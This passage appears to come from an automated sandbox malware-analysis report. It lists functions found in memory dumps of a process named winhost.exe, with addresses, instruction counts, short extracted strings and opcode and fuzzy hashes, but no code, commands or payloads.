                                            • Opcode Fuzzy Hash: 9b4ffb6e15903b5e9a0fbf0432df6376d3e8b2f821ed3cb0db4fb7daf04c03e4
                                            • Instruction Fuzzy Hash: 95F02022A0CB161FE362532849853A21BE0DF8B221F0600B7E44CC61C2EC0D5C059360
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB02FD, Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 086b9b71ada07c2cb4c973705b166f31a0a28acfc2980973c4f863dd3232072f
                                            • Instruction ID: b0e0f9f8e34c3c2f5d064465a681f1509e4534542078ddea7cd3968f7f759082
                                            • Opcode Fuzzy Hash: 086b9b71ada07c2cb4c973705b166f31a0a28acfc2980973c4f863dd3232072f
                                            • Instruction Fuzzy Hash: 34E082A281EBC90FE307933089223103F609F07210F9A00EAC04DCB0E3E8491E8AC322
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB0F61, Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88fa22f6b774a0180e857ca646f511ef188fe528a0c5176ae584d824603890fd
                                            • Instruction ID: f04b78bb359b5a4cfbc32e7054b952d8e9294b409330c96e2bdbf22b7ea7de05
                                            • Opcode Fuzzy Hash: 88fa22f6b774a0180e857ca646f511ef188fe528a0c5176ae584d824603890fd
                                            • Instruction Fuzzy Hash: DDD05E0085E2C50FC70293748C1A4957FF59E47110B4FC1F5D089CF053E40D45058362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Analysis Process: winhost.exe PID: 6944 Parent PID: 4804 winhost.exeCOMMON

                                            Executed Functions

                                            Function 00007FFA35FD0588, Relevance: 5.2, Strings: 4, Instructions: 232COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: s5$ s5$ s5$8.5
                                            • API String ID: 0-2748289946
                                            • Opcode ID: 63aff2dfae6a1837d2b735e37b18378fec509449535a21661b442a964ba8d8eb
                                            • Instruction ID: dca39df6bbce8aab413cd86b58993ba4eb766e259b5458c4f4fcf387221459df
                                            • Opcode Fuzzy Hash: 63aff2dfae6a1837d2b735e37b18378fec509449535a21661b442a964ba8d8eb
                                            • Instruction Fuzzy Hash: 6561B630A18B0E8FEB94EB1C84597B937E0FF5A700F5484B9E40ECB196DE39A805DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD094E, Relevance: 3.0, Strings: 2, Instructions: 468COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: h|5$|5
                                            • API String ID: 0-2177373217
                                            • Opcode ID: fdcd8f206ad6d930ab42796b0a882c733354db30e98a8c3557cca471d1896870
                                            • Instruction ID: a4a7e6d6eaa3464ff75d1c5db4f1b99103a9dfb1277ac02e925c893db891133b
                                            • Opcode Fuzzy Hash: fdcd8f206ad6d930ab42796b0a882c733354db30e98a8c3557cca471d1896870
                                            • Instruction Fuzzy Hash: EFF12A11A0DB864FE3A6EB3C88656A67FE1EF5B340F5480FAD04DCB29BDD186809C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD14D0, Relevance: 2.1, Strings: 1, Instructions: 870COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: X|5
                                            • API String ID: 0-721148514
                                            • Opcode ID: 20008ee72f0ab191f8df121ea7391d8e441a7acb5f5764267be0795dcdd9fe54
                                            • Instruction ID: d0982e753f39b190b546cea312f2a5095b51527ba86aac89bac7010b74c20284
                                            • Opcode Fuzzy Hash: 20008ee72f0ab191f8df121ea7391d8e441a7acb5f5764267be0795dcdd9fe54
                                            • Instruction Fuzzy Hash: A652B420A1CB8A0FEB69BB3C88557B937D1EF4A740F5480B9E44EC72D7DE29A901D711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD0360, Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: H
                                            • API String ID: 0-2852464175
                                            • Opcode ID: bd2f1aca1bc46abfe078806c83be6c124a427400433ba253547cabaad61a588e
                                            • Instruction ID: db7d16af2b80d4373882ba76b283776d9137d8a32075c30d0e614f0755d89a8a
                                            • Opcode Fuzzy Hash: bd2f1aca1bc46abfe078806c83be6c124a427400433ba253547cabaad61a588e
                                            • Instruction Fuzzy Hash: BF416230A19A498FDF94EB3C8456A69B7E1EF56314B5444FCD40ECB296DE28E900C741
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD0D89, Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: |5
                                            • API String ID: 0-878650909
                                            • Opcode ID: 9e50c65e088014d6ea47226365147be63da20baaddba89db89525e5fae67aaaa
                                            • Instruction ID: bc104d84d9e63ad58197c5e25df88fdfc701097aefdc307149e17cc096f4f6b4
                                            • Opcode Fuzzy Hash: 9e50c65e088014d6ea47226365147be63da20baaddba89db89525e5fae67aaaa
                                            • Instruction Fuzzy Hash: 0501F411B0DA9D0FD799A76C58507A837D1EF9F240F1084FAD04ED7287EC1958058751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD678E, Relevance: .3, Instructions: 298COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4341301033aeb38bcea130665cb8c604598d784ac7ab1cd45168b29e7b1b5ca3
                                            • Instruction ID: 1992733e544cc7f08546894788932314095ae2e271c48f5e43f3a3f36854bef3
                                            • Opcode Fuzzy Hash: 4341301033aeb38bcea130665cb8c604598d784ac7ab1cd45168b29e7b1b5ca3
                                            • Instruction Fuzzy Hash: 7DA11770518A8D8FEBA4EF18C895AE97BE0FF49304F40816AE84DC7192DF399845CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD84A9, Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c88cc0cbcdb82a3b1e49c8589b6b7ffd46bffc305986010a31ab1f110bbd21d8
                                            • Instruction ID: 9b4d6d879e5af1769445e99ac9a1596ba35e619f8ad68e6560d02cdfd8eafdf9
                                            • Opcode Fuzzy Hash: c88cc0cbcdb82a3b1e49c8589b6b7ffd46bffc305986010a31ab1f110bbd21d8
                                            • Instruction Fuzzy Hash: 4381296060CB890FE75A9B2C98117A93BE1EF4B700F9481BAF44DC72D3CD29AD05D755
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD7899, Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e66c7f567fdbc8c83c5624e2975b89fd316e9af68695866e2163438090324514
                                            • Instruction ID: 5d03f3b34c208b3382ba7cb750d2b8b5e14dc4be036752978a29837e78008e1a
                                            • Opcode Fuzzy Hash: e66c7f567fdbc8c83c5624e2975b89fd316e9af68695866e2163438090324514
                                            • Instruction Fuzzy Hash: D6914D70518A4D9FEBA4EF18C899BE93BE0FF59354F944179E80DC7292DE399884CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD2851, Relevance: .3, Instructions: 265COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 339135d8329c7ebd1cac2a2e6fa57cf9bf4738b70c02e34d69f03e504a87b0ae
                                            • Instruction ID: 7916dff93c518b10f959fb23df91e549b4102d2c3b4f009e38891bad1a1ecbf9
                                            • Opcode Fuzzy Hash: 339135d8329c7ebd1cac2a2e6fa57cf9bf4738b70c02e34d69f03e504a87b0ae
                                            • Instruction Fuzzy Hash: 05817F70518A4D8FDBA8EF18DC86BE937E1FB59300F50816AE84DC7252DF35AA45CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD20F9, Relevance: .2, Instructions: 246COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51989072416b8e6ef11a3ceac2156a0adfc7ee0ccdc66119a7f704e55f6e5297
                                            • Instruction ID: 76fa2d3dd84e2fb45e18625620055d422fa9b96f53e54b87cff9c419483c83d5
                                            • Opcode Fuzzy Hash: 51989072416b8e6ef11a3ceac2156a0adfc7ee0ccdc66119a7f704e55f6e5297
                                            • Instruction Fuzzy Hash: 0B91EB70918A8E8FEBA4DF28C8457E93BE0FF19344F504075E84DC7296DE35A985DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD1158, Relevance: .2, Instructions: 244COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5884da20cfc5fbceef452fa97def8dc77d6e535f8f949858ae37a9f3482283c3
                                            • Instruction ID: e49b0132b941fb264d252f6981c39e98092cdfc386b6c1ab975a3b602ff3205f
                                            • Opcode Fuzzy Hash: 5884da20cfc5fbceef452fa97def8dc77d6e535f8f949858ae37a9f3482283c3
                                            • Instruction Fuzzy Hash: 1A71ED30718A494FEB95EB2C889977D77E2EFDA300F5981B5E00DC729ACF6898458742
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD2505, Relevance: .2, Instructions: 203COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d456e476f23f70df3436d4409b3610ea3ebd2f0d6ce8a5146fb84a78af17f23
                                            • Instruction ID: 7fb69d5a2960abb2ded1a6e0944f3d41206da2bd9dd02bb6b5e0c169bf9baba9
                                            • Opcode Fuzzy Hash: 0d456e476f23f70df3436d4409b3610ea3ebd2f0d6ce8a5146fb84a78af17f23
                                            • Instruction Fuzzy Hash: 70519E24718B5A1FEBA5EB788C997B937D0EF5B201F0880F9E80EC7193DD189841C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD97A5, Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae4302ea5eafb218458a2cf22acd8eea4e3b3b40b7c3c7e12ed39a68935c37e2
                                            • Instruction ID: b4e32010f1b947b9ba090d7e8b635591c036b0827ff1e7affe9dedcd3c1b25dd
                                            • Opcode Fuzzy Hash: ae4302ea5eafb218458a2cf22acd8eea4e3b3b40b7c3c7e12ed39a68935c37e2
                                            • Instruction Fuzzy Hash: DB51EA60A0CB8A4FEB55AB2848453B97BE1EF47700F5481BEE44DC72D7DE29A801D751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD3789, Relevance: .2, Instructions: 186COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6153aeebbc25b3c3fa6171fbb8487af71e931911e0f8432d874268e9a761293a
                                            • Instruction ID: 4b25c645367ba41a4a8447cbb329d2bbe709b731a6ffbb430d8fdbac8da899ed
                                            • Opcode Fuzzy Hash: 6153aeebbc25b3c3fa6171fbb8487af71e931911e0f8432d874268e9a761293a
                                            • Instruction Fuzzy Hash: 3E518F71518B8D8FEBA4DF18C885BE97BE1FB19310F50816AE84DC7292DF34A649CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD7D56, Relevance: .2, Instructions: 177COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d388766063b69bcbe053cdfa2b1a86ca48c9de76e6a9b154491acf95c7a64465
                                            • Instruction ID: b758d287accea4eafbfd79705676d5364e93c8619abe8a178ffc0422b6734ce6
                                            • Opcode Fuzzy Hash: d388766063b69bcbe053cdfa2b1a86ca48c9de76e6a9b154491acf95c7a64465
                                            • Instruction Fuzzy Hash: DE51A061A0DB8A4FEB969B3C88917687FE1EF1B240F5480FAD44DCB297DE289D04C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD2B7A, Relevance: .2, Instructions: 164COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 78dfac6d65e48324cd1d63eab8b9caf5c4d906b8881ab8858a18ec3b7ee9f2b2
                                            • Instruction ID: 0fce96f92cc748035450eb739f6800c2a56841fddcb866f7401feea3cdb6af85
                                            • Opcode Fuzzy Hash: 78dfac6d65e48324cd1d63eab8b9caf5c4d906b8881ab8858a18ec3b7ee9f2b2
                                            • Instruction Fuzzy Hash: CC41B410B58B8A2FEB56F77888997B97BD2EF5B300F8580F5D44DC7293DD28A8018751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35E8A009, Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686398767.00007FFA35E8A000.00000040.00000001.sdmp, Offset: 00007FFA35E8A000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4fbfb2a0093cb1b3b70db9a823264ec3f985ea911fb49a0531a4ba50936d1f07
                                            • Instruction ID: 81200995e5266490f0444cbdb9155e0b91392f4230027ae6b8430b688c3d004e
                                            • Opcode Fuzzy Hash: 4fbfb2a0093cb1b3b70db9a823264ec3f985ea911fb49a0531a4ba50936d1f07
                                            • Instruction Fuzzy Hash: 0D41F47140CB855FE76ACF299846A527FF0EF52320F1501DFD488C71A3E725A845C7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8C6E, Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4fc694d995ff503de7c8271c592c91f08aeb71e6264c38c03df67a98b8714505
                                            • Instruction ID: 07fd8c906f2a526f4e1a2cff9316b29a4a9d00bd2346b24004885e01e49fe5f9
                                            • Opcode Fuzzy Hash: 4fc694d995ff503de7c8271c592c91f08aeb71e6264c38c03df67a98b8714505
                                            • Instruction Fuzzy Hash: BC31386090DB8F4FE755AB3888456B97BD0EF17710F0485BAE04EC70EBDE299800CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD91A9, Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1d15cc01c89292543f8bb2862590db2d555ede9883fd110d5bdeb3288891c85
                                            • Instruction ID: 29c5209ceebe6982402beb137c2543664f5c0b0a2aab15c8dd0bcf5888c4a9ce
                                            • Opcode Fuzzy Hash: e1d15cc01c89292543f8bb2862590db2d555ede9883fd110d5bdeb3288891c85
                                            • Instruction Fuzzy Hash: 2131C120A1D78A5FEB96972888507B93BE1AF47301F9481FAE44ECB1D7DE295805C711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8121, Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93ab0e7b439cffa334152280162bd07dd9bcf3072fb53a96ae93259123e8f7ce
                                            • Instruction ID: 1111f76d5ddeff2f6dcf29e03c58dd3dae180312a808d0bd451bc89fd00dbe95
                                            • Opcode Fuzzy Hash: 93ab0e7b439cffa334152280162bd07dd9bcf3072fb53a96ae93259123e8f7ce
                                            • Instruction Fuzzy Hash: 7731D771B08B4A4FE744AB2C88856B93BE1EF5A701F04807AF40DC7297DE299C09C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8B11, Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acedc37c4af37862e1b11a34ad17d3db5dcdf0e93528c84b9fc5dbb7ec317e8b
                                            • Instruction ID: 182cca0818324cddf28c0009c3fd923109836e1b1ad0349e8ef25cfd7068b8bd
                                            • Opcode Fuzzy Hash: acedc37c4af37862e1b11a34ad17d3db5dcdf0e93528c84b9fc5dbb7ec317e8b
                                            • Instruction Fuzzy Hash: 9331B461708F4A4FDBA5EB5C889977837E1EF6E701B4540B6D04DC7267CE24AC45CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8EC9, Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c481e59bbf188eea920b6a6ac875c2e73c59ec479e6dff93e9d010125c51ddcc
                                            • Instruction ID: 9f264f253d8882b7495d3c5d3204c14f21f25049046a2c02999ec566b7844ede
                                            • Opcode Fuzzy Hash: c481e59bbf188eea920b6a6ac875c2e73c59ec479e6dff93e9d010125c51ddcc
                                            • Instruction Fuzzy Hash: 2E312561A0CB8A5FEB42DB2888917A5BFE1EF47300F5481F6E04DCB193DF28A805C761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD2709, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e308676df1f750afae9dfa48ac0256d165c3344e0065b0b39d5c8c0d378a6ef1
                                            • Instruction ID: 01a9a5fd0af52e58328188ba15b7d557509df567ec92fd0e86960b2d5c66cfb0
                                            • Opcode Fuzzy Hash: e308676df1f750afae9dfa48ac0256d165c3344e0065b0b39d5c8c0d378a6ef1
                                            • Instruction Fuzzy Hash: CE314BB141868D9FDB81DF28C854BDA7BE0FF19344F5142AAE84DC7291DB349648CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD7F7D, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d50badce45e5d8c16e39e1fbf6197672373bcbbcf07658b8a21cc2e22356dfbd
                                            • Instruction ID: ce2aa6338ebbc7e79f02c87adb49ff15da07439628e1b837509295c9ddde7ff1
                                            • Opcode Fuzzy Hash: d50badce45e5d8c16e39e1fbf6197672373bcbbcf07658b8a21cc2e22356dfbd
                                            • Instruction Fuzzy Hash: 35317E6590E7C50FE7878B3888696217FF1AF07254B4A80EAD08CCF1A7EE595C49C761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD960D, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4110f0e4f7939173db45e94aa1137a9a89db45bc3532f55389d1c64702d1a1d
                                            • Instruction ID: c3e8e507dbeda68accbc62f151a494e44ca740347b2cbb2f738e01e7cb2a9876
                                            • Opcode Fuzzy Hash: a4110f0e4f7939173db45e94aa1137a9a89db45bc3532f55389d1c64702d1a1d
                                            • Instruction Fuzzy Hash: FE215C6061870E5FDB54EF2888916BA77E1FF4A300F40C0B9E80ECB18ADE29E801DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD9341, Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3ddea93fa42b66386e00ba932b1bea496022d42533b3c022f74ab7e67dfa8e9
                                            • Instruction ID: 184e2a740fc0c94c4fee4f57a3417a188f7ab35aa5d6f281905d36017fe41ab8
                                            • Opcode Fuzzy Hash: f3ddea93fa42b66386e00ba932b1bea496022d42533b3c022f74ab7e67dfa8e9
                                            • Instruction Fuzzy Hash: 382102729083856FE716C7249C45BE23BB5EB4A360F1A81A3F40CCB292C92D5E42C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD9AD9, Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d480967c0a4da4a8e4b34d98a1a2acf7c9481b51152d8c97a7886ddd2140f96
                                            • Instruction ID: 3bce95030e0dc7a839c3da5850bead510b45a43f884d369440f266702d36cf94
                                            • Opcode Fuzzy Hash: 0d480967c0a4da4a8e4b34d98a1a2acf7c9481b51152d8c97a7886ddd2140f96
                                            • Instruction Fuzzy Hash: 0A21A06140E7C65ED7539B7888159A17FE0AF0B650F4E84EED4CDCB093DE1A8609CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD00A4, Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c589ee16fb0623f23abb6fa2b11032f2540cbd164498d2fc40dab696ba6151e4
                                            • Instruction ID: b1c4f943e3ce09736f5976ec3ae5847e9bf0cb749f241e4bb19e8b00add61afd
                                            • Opcode Fuzzy Hash: c589ee16fb0623f23abb6fa2b11032f2540cbd164498d2fc40dab696ba6151e4
                                            • Instruction Fuzzy Hash: 0A11516181C3CB9FE7429B2488151B63FA5EF13640F0986B6E88DC7096EE2DAD04D751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8E06, Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c38ea51b8d869462e4ff718f76ada7d8e3737395856898319f0ef9f9a0917ccd
                                            • Instruction ID: 8b0e4904461e04b8888de4deedcdb3a94ddd3698cf3dc0cd418fd1c792f45b31
                                            • Opcode Fuzzy Hash: c38ea51b8d869462e4ff718f76ada7d8e3737395856898319f0ef9f9a0917ccd
                                            • Instruction Fuzzy Hash: 8811065190D7C95FD7439B3888556A53FB1DF57200F0980EBD089CF1A3DE598A05CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8049, Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c689f45be0daf7beb01d21e5dd72964e58702aa4284e2905922e41574b874135
                                            • Instruction ID: 8c6bfd2174532012a3a9b8372537feb79d6b6577b809d3804425a475189006b2
                                            • Opcode Fuzzy Hash: c689f45be0daf7beb01d21e5dd72964e58702aa4284e2905922e41574b874135
                                            • Instruction Fuzzy Hash: 1401B161B09B4A4FF782972C88946243FF0EF5B251F5A40E2E40DCB2A3DE189C46D761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD821E, Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60a2893a5eb8abf603acc7cb183f13d13763eaf5852742e978194c38aea8a141
                                            • Instruction ID: c01f9e050bacfc05e8abc0cfc67e3ea654c2353e5991d171c164fee906d756a8
                                            • Opcode Fuzzy Hash: 60a2893a5eb8abf603acc7cb183f13d13763eaf5852742e978194c38aea8a141
                                            • Instruction Fuzzy Hash: 14114871608B4D4FDB40EF2888457E97BD0FF4A315F1441BAE44DC3192DB3999058B40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD0EE3, Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.686828371.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b67ca34519404a0f441e2d348c9b15b4d6e1464e9e94503816936a5d843a20e
                                            • Instruction ID: 5ca5247ba7ac580d0a78c707509bdd0ce8ecf1445f13087be289bf0cb86e492c
                                            • Opcode Fuzzy Hash: 9b67ca34519404a0f441e2d348c9b15b4d6e1464e9e94503816936a5d843a20e
                                            • Instruction Fuzzy Hash: 4A018401B18B4B0FFB95A37C18A617C96D2DF8B650B90C4BAD40EC72D7EC5DAD459310
